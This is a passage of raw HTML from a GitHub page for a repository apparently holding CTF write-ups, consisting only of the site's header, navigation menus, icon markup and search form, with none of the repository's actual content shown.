content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button> <div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <div class="flex-1"> Sign up </div> <div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div> <div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> Explore All features Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For Enterprise Teams Startups Education <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> By Solution CI/CD & Automation DevOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Case Studies Customer Stories Resources <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> Repositories Topics Trending Collections </div> Pricing </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0"> <div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="481769760" data-scoped-search-url="/not1cyyy/CTF-Writeups/search" data-owner-scoped-search-url="/users/not1cyyy/search" data-unscoped-search-url="/search" data-turbo="false" action="/not1cyyy/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="HhcXpaEfTNKgOty0BWYAuaouD0PJSRTCN1FkuHuqo7U4V4ZGxBEVnJUoLFZh4CxOyiVUQWu5Id7Lt6kdWjeEaw==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <span>No suggested jump to results</span> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 